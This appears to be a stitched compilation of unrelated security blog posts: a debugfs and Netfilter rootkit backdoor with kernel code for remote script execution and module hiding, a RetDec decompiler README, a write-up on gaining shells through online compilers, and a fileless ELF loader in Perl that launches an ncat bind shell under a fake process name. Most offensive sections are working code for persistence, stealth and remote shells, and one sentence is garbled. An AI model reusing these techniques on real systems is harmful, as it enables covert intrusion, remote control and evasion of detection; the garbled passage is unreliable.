Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Retargetable Machine-Code Decompiler: RetDec

RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:

  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

 

Features:

  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.

 

After seven years of development, Avast open-sources its machine-code decompiler for platform-independent analysis of executable files. Avast released its analytical tool, RetDec, to help the cybersecurity community fight malicious software. The tool allows anyone to study the code of applications to see what the applications do, without running them. The goal behind open sourcing RetDec is to provide a generic tool to transform platform-specific code, such as x86/PE executable files, into a higher form of representation, such as C source code. By generic, we mean that the tool should not be limited to a single platform, but rather support a variety of platforms, including different architectures, file formats, and compilers. At Avast, RetDec is actively used for analysis of malicious samples for various platforms, such as x86/PE and ARM/ELF.

 

What is a decompiler?

A decompiler is a program that takes an executable file as its input and attempts to transform it into a high-level representation while preserving its functionality. For example, the input file may be application.exe, and the output can be source code in a higher-level programming language, such as C. A decompiler is, therefore, the exact opposite of a compiler, which compiles source files into executable files; this is why decompilers are sometimes also called reverse compilers.

By preserving a program’s functionality, we want the source code to reflect what the input program does as accurately as possible; otherwise, we risk assuming the program does one thing, when it really does another.

Generally, decompilers are unable to perfectly reconstruct original source code, due to the fact that a lot of information is lost during the compilation process. Furthermore, malware authors often use various obfuscation and anti-decompilation tricks to make the decompilation of their software as difficult as possible.

RetDec addresses the above mentioned issues by using a large set of supported architectures and file formats, as well as in-house heuristics and algorithms to decode and reconstruct applications. RetDec is also the only decompiler of its scale using a proven LLVM infrastructure and provided for free, licensed under MIT.

Decompilers can be used in a variety of situations. The most obvious is reverse engineering when searching for bugs, vulnerabilities, or analyzing malicious software. Decompilation can also be used to retrieve lost source code when comparing two executables, or to verify that a compiled program does exactly what is written in its source code.

There are several important differences between a decompiler and a disassembler. The former tries to reconstruct an executable file into a platform-agnostic, high-level source code, while the latter gives you low-level, platform-specific assembly instructions. The assembly output is non-portable, error-prone when modified, and requires specific knowledge about the instruction set of the target processor. Another positive aspect of decompilers is the high-level source code they produce, like  C source code, which can be read by people who know nothing about the assembly language for the particular processor being analyzed.

 

Installation and Use

Currently,RetDec support only Windows (7 or later) and Linux.

 

Windows

  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec’s Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    bash decompile.sh test.exe
    

    For more information, run bash decompile.sh --help.

 

Linux

  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution’s package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    ./decompile.sh test.exe
    

    For more information, run ./decompile.sh --help.

 

Build and Installation


Requirements

Linux

On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:

sudo apt-get install build-essential cmake git perl python bash coreutils wget bc graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf pkg-config m4 libtool

 

Windows

  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec’s Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

 

Process

Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr,/usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. 

  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.

You have to pass the following parameters to cmake:

  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.

You can pass the following additional parameters to cmake:

  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Take full control of online compilers through a common exploit

Online compilers are a handy tool to save time and resources for coders, and are freely available for a variety of programming languages. They are useful for learning a new language and developing simple programs, such as the ubiquitous “Hello World” exercise. I often use online compilers when I am out, so that I don’t have to worry about locating and downloading all of the resources myself.

Since these online tools are essentially remote compilers with a web interface, I realized that I might be able to take remote control of the machines through command injection. My research identified a common weakness in many compilers: inadequate sanitization of user-submitted code prior to execution. My analysis revealed that this lack of input filtration enables exploits that an hacker can use to take control of the machine or deliberately cause it to crash.

A clever attacker can exploit built-in C functions and POSIX libraries to gain control over the computer hosting the online compiler. Commands like execl()system(), and GetEnv() can be used to probe the target machine operating system and run any command on its built-in shell.

Vulnerability description


Gaining access

In several of the C/C++ compilers that I analyzed, the GetEnv(), system(), functions allow an attacker to study and execute any command on the remote machine. The GetEnv() function allows a hacker to learn information about the machine that is otherwise concealed from the web interface such as the username an OS version.

Once this information is revealed, the attacker can begin testing various exploits to achieve privilege escalation and gain access to a root shell. For example, the system() command can be used to execute malicious code and access sensitive data such as logs, website files, etc.

Since the exploit I discovered involves inserting hostile commands to gain control of an unwitting machine, this attack vector is classified as a “code injection” vulnerability.

 

Maintaining control

If hacker tries to run the online compiler every time they want to send a new command, the attack would leave an obvious trace, and the resource use might draw attention to the suspicious activity. These obstacles can be conveniently sidestepped by using the execl() function, which allows the user to specify any arbitrary program to replace the current process. An attacker can gain access to the machine’s built-in shell by invoking the execl() function to replace the current process with /bin/sh, with catastrophic implications.

Many compilers allow input from the browser, in which case the hacker can craft a program to relay input commands to the shell of the compromised machine. Once the hacker uses execl() to open a shell via browser, they can simply operate the remote machine using system() to inject various instructions. This avoids the need to run the compiler each time the attacker wishes to explore or exploit the compromised machine.

Implications


A hacker that obtains shell access in this way gains access to files and services typically protected from outside users. The attacker now has many options at their disposal for exploiting the machine and/or wreaking havoc; how they proceed will depend on their tools and motives.

If the attacker wishes to crash the target machine, they can achieve this by (mis)using the fork() function, which creates a new cryptocurrency and generates free money clone of the current process. A fork() function placed within a while (true) loop will execute indefinitely, repeatedly cloning the process to greedily consumed precious RAM memory. This rapid uncontrolled use of resources will overwhelm the machine, causing a self-DOS (denial of service attack).

Instead of maliciously crashing a machine, an attacker may wish to monetize their illicit access. This can be accomplished by injecting a cryptocurrency miner, which will generate funds for the attacker at the expense of the victim’s computational resources and electric bill. My analysis showed that this maneuver allows useful exploitation of online compilers that successfully stymied other attacks by sandboxing the environment or adopting more advanced techniques to limit file access.

Theory


This section documents the commands used to gain and maintain access to the online compiler. These functions require the unistd.h and stdlib.h libraries.

execl()
Declaration
int execl(const char *pathname, const char *arg, ...);
Parameters

pathname — char*, the name of the program

arg — char*, arguments passed to the program, specified by pathname

Description

The execl() function replaces the current process with a new process. This is the command exploited to maintain control over the remote machine without having to repeatedly use the online compiler. Reference the underlying execve() function for more details.

 

System()
Declaration
int system (const char* command);
Parameters

command — char* command name

Description

The C system function passes the command name, specified by command, to the host’s built-in shell (/bin/sh for UNIX-based systems) which executes it. This function is based on execl(), so system() will be called by executing:

execl(, "sh", "-c", command, (char *)0);
Return

This function returns the output of the command after it has been executed. If the shell encounters an error while executing the command, it will return the numeric value -1.

GetEnv()
Declaration
char *getenv(const char *name)
Parameters

name — const char* variable name.

Description

Retrieves a string containing the value of the environment variable whose name is specified as an argument ( name ).

Return

The function returns the contents of the requested environment variable as a string. If the requested variable is not part of the list of environments, the function returns a null pointer.

Proof of Concepts


#include "stdio.h"
#include "unistd.h"

int main(){
	 execl("/bin/sh",NULL,NULL); // Open the shell 
	 return 0;
}
#include "stdio.h"
#include "stdlib.h"

int main(){
	system("whoami"); // Find username 
	system("cd / && ls"); // Lists all files and directories on /
	return 0;
}

Solutions


Thankfully, most of the risks highlighted above can be mitigated relatively easily. Access to protected files and services can be prevented by creating a secure sandbox for the application. This minimizes the potential for collateral damage and inappropriate data access, but will not prevent some attacks such as cryptocurrency miner injection. In order to avoid these «mining» attacks, the sandbox should have limited resources and it should be able to reboot itself every 10 minutes.

To eliminate the underlying weakness, the libraries could be recompiled without the particular exploitable functions. An attacker cannot gain a foothold if the execl() and system() are removed or disabled by recompiling libraries.

Screenshots


 

In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

